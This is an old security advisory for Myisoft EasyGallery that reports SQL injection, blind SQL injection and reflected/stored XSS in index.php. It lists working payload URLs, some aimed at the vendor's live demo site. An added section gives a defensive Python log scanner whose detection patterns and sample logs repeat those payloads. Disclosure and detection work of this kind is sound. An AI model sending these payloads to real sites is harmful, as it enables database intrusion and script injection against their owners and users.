Myisoft EasyGallery Cross Site Scripting / SQL Injection

2011-09-05T00:00:00
ID PACKETSTORM:104793
Type packetstorm
Reporter Eyup CELIK
Modified 2011-09-05T00:00:00

Description

                                        
`# Exploit Title: MYISOFT EasyGallery SQL Injection - Blind SQL Injection - Stored XSS  
# Date: 2011  
# Author: Eyup CELIK  
# Version: All Version  
# Tested on: All versions are vulnerable  
# Web Site: www.eyupcelik.com.tr  
  
  
ISSUE  
  
SQL injection, blind SQL injection and XSS are possible through the request input (URL parameters and path) of index.php.  
  
Vulnerable Page:  
index.php  
  
  
Example:  
index.php?do=<SQL Injection Code>&page=register&PageSection=0  
index.php?catid=<SQL Injection Code>&page=category&PageSection=0  
index.php/<XSS Code>  
index.php?Go=Go&page=search&search=<Blind SQL Injection>  
  
  
Exploit:  
index.php?catid=1'&page=category&PageSection=0  
index.php/%27onmouseover=prompt(932505)%3E  
index.php?Go=Go&page=search&search=1' or (sleep(2)%2b1) limit 1 --  
  
  
POC:  
http://myiosoft.com/products/EasyGallery/demo/staticpages/easygallery/index.php?catid=1'&page=category&PageSection=0  
http://myiosoft.com/products/EasyGallery/demo/staticpages/easygallery/index.php/%27onmouseover=prompt(932505)%3E  
http://myiosoft.com/products/EasyGallery/demo/staticpages/easygallery/index.php?Go=Go&page=search&search=1' or (sleep(2)%2b1) limit 1 --  
  
  
  
Thanks,  
  
Eyup CELIK  
Information Technology Security Specialist  
http://www.eyupcelik.com.tr  
`
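
For defenders reviewing web server logs for the request patterns listed in the advisory, the following Python is an added example, not part of the original advisory or of the product's code. It assumes combined-format access logs, integer `catid` values and a hypothetical `/gallery/` install path; the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request field of a combined-format access log line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Per-parameter patterns for the index.php inputs named in the advisory.
PARAM_RULES = {
    "catid": re.compile(r"\D"),  # assumption: category ids are plain integers
    "do": re.compile(r"['\"]|--"),
    "search": re.compile(r"'\s*(?:or|and)\b|\b(?:sleep|benchmark)\s*\(", re.I),
}
# Markup characters or an inline event handler in the path after index.php/.
PATH_INFO_RULE = re.compile(r"[<>'\"]|\bon\w+\s*=", re.I)

def findings(uri):
    """Return the rule names triggered by one request URI."""
    parts = urlsplit(uri)
    hits = []
    _, sep, path_info = unquote(parts.path).partition("index.php/")
    if sep and PATH_INFO_RULE.search(path_info):
        hits.append("xss-path-info")
    params = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    for name, rule in PARAM_RULES.items():
        if any(rule.search(v) for v in params.get(name, [])):
            hits.append("sqli-" + name)
    return hits

def scan(lines):
    """Return (client address, rule names) for each log line that triggers a rule."""
    alerts = []
    for line in lines:
        m = REQUEST_RE.search(line)
        hits = findings(m.group(1)) if m else []
        if hits:
            alerts.append((line.split()[0], hits))
    return alerts

# Constructed sample log: documentation addresses, hypothetical /gallery/ path.
SAMPLE_LOG = [
    '198.51.100.4 - - [05/Sep/2011:10:00:01 +0000] "GET /gallery/index.php?catid=3&page=category&PageSection=0 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [05/Sep/2011:10:00:09 +0000] "GET /gallery/index.php?catid=1%27&page=category&PageSection=0 HTTP/1.1" 200 812',
    '203.0.113.7 - - [05/Sep/2011:10:00:15 +0000] "GET /gallery/index.php/%27onmouseover=prompt(932505)%3E HTTP/1.1" 200 5301',
    '203.0.113.7 - - [05/Sep/2011:10:00:21 +0000] "GET /gallery/index.php?Go=Go&page=search&search=1%27%20or%20(sleep(2)%2b1)%20limit%201%20-- HTTP/1.1" 200 4977',
]

if __name__ == "__main__":
    for client, hits in scan(SAMPLE_LOG):
        print(client, ",".join(hits))
```

The `search` rule is deliberately narrower than the others so that ordinary apostrophes in search terms do not raise alerts; the real fix remains parameterized queries and output encoding in the application.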